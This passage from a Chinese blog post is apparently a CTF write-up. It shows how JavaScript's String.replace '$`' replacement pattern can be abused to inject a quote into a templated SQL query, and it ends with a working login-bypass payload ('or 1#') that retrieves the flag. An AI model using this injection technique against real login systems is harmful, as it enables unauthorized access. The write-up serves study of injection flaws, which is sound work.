sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;username&#125;"</span><span class="token punctuation">,</span>username<span class="token punctuation">)</span><span class="token punctuation">;</span>
sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;password&#125;"</span><span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>看一下replace的源码：</p>
<pre class="line-numbers language-tsx" data-language="tsx"><code class="language-tsx"><span class="token comment">/**
 * Replaces text in a string, using this regular expression.
 * @param string A String object or string literal whose contents matching against
 *               this regular expression will be replaced
 * @param replacer A function that returns the replacement text.
 */</span>
<span class="token punctuation">[</span>Symbol<span class="token punctuation">.</span>replace<span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token builtin">string</span><span class="token operator">:</span> <span class="token builtin">string</span><span class="token punctuation">,</span> <span class="token function-variable function">replacer</span><span class="token operator">:</span> <span class="token punctuation">(</span>substring<span class="token operator">:</span> <span class="token builtin">string</span><span class="token punctuation">,</span> <span class="token operator">...</span>args<span class="token operator">:</span> <span class="token builtin">any</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token builtin">string</span><span class="token punctuation">)</span><span class="token operator">:</span> <span class="token builtin">string</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>replace 支持正则表达式，在MDN文档里能找到内置的正则静态属性：<a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/RegExp/leftContext">https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/RegExp/leftContext</a></p>
<blockquote>
<p><strong>leftContext</strong> 非标准属性是正则表达式的静态和只读属性，含有最新匹配的左侧子串。 RegExp.$&#96; 是这个属性的别名。</p>
</blockquote>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript">RegExp<span class="token punctuation">.</span>leftContext
RegExp<span class="token punctuation">[</span><span class="token string">'$`'</span><span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>测试：</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">var</span> sql <span class="token operator">=</span> <span class="token string">"select * from userinfo where username = '&#123;username&#125;' and password = '&#123;password&#125;'"</span><span class="token punctuation">;</span>
sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;username&#125;"</span><span class="token punctuation">,</span> <span class="token string">"$`"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;password&#125;"</span><span class="token punctuation">,</span> <span class="token string">"$`"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>sql<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>返回</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> userinfo <span class="token keyword">where</span> username <span class="token operator">=</span> <span class="token string">'select * from userinfo where username = '' and password = '</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> userinfo <span class="token keyword">where</span> username <span class="token operator">=</span> <span class="token string">'select * from userinfo where username = '' and password = '</span>'<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这样就拿到我们需要的<code>&#39;</code>了</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"$`"</span>%2C<span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"1"</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-sqlite" data-language="sqlite"><code class="language-sqlite">select * from userinfo where username &#x3D; &#39;select * from userinfo where username &#x3D; &#39;&#39; and password &#x3D; &#39;1&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后构造注入得到payload：</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"$`"</span>%2C<span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"or 1%23"</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> userinfo <span class="token keyword">where</span> username <span class="token operator">=</span> <span class="token string">'select * from userinfo where username = '' and password = '</span><span class="token operator">or</span> <span class="token number">1</span><span class="token comment">#'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2025/01/18/%E7%AC%AC%E5%85%AB%E5%B1%8A%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/image-20250118165020071.png" alt="image-20250118165020071"></p>
<p>然后就会下载到flag了（这里可以知道数据库不是sqlite，sqlite的注释符是<code>--</code>）</p>
<p><img src="/blog/2025/01/18/%E7%AC%AC%E5%85%AB%E5%B1%8A%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/image-20250118174053483.png" alt="image-20250118174053483"></p>

    </div>
    
    
    
    
    
    
    
</div>

      </div>
    </transition>
    
    <transition name="fade">
      <div id="preview" ref="preview" v-show="previewShow">
        <img id="preview-content" ref="previewContent" />
      </div>
    </transition>
    
  </div>
  <script src="/blog/js/main.js"></script>
  
  




  
  

<div id="vcomments"></div>
<script defer src="/blog/js/lib/valine.min.js" onload="
    new Valine({
        el: '#vcomments',
        app_id: 'U9mZLKunkRUTcBFthjXPjnZE-9Nh9j0Va',
        app_key: 'SzWOnY0PWLGNuL6jW8TZYc7j',
        visitor: 'true',
        placeholder: '写点什么吧(●ˇ∀ˇ●)',
        serverURLs: 'https://u9mzlkun.lc-cn-n1-shared.com',
    });
"></script>


  <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2026 雲流のLowest World
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;C1oudfL0w0
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

<script src="/blog/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/blog/live2dw/assets/z16.model.json"},"display":{"position":"left","width":150,"height":290},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>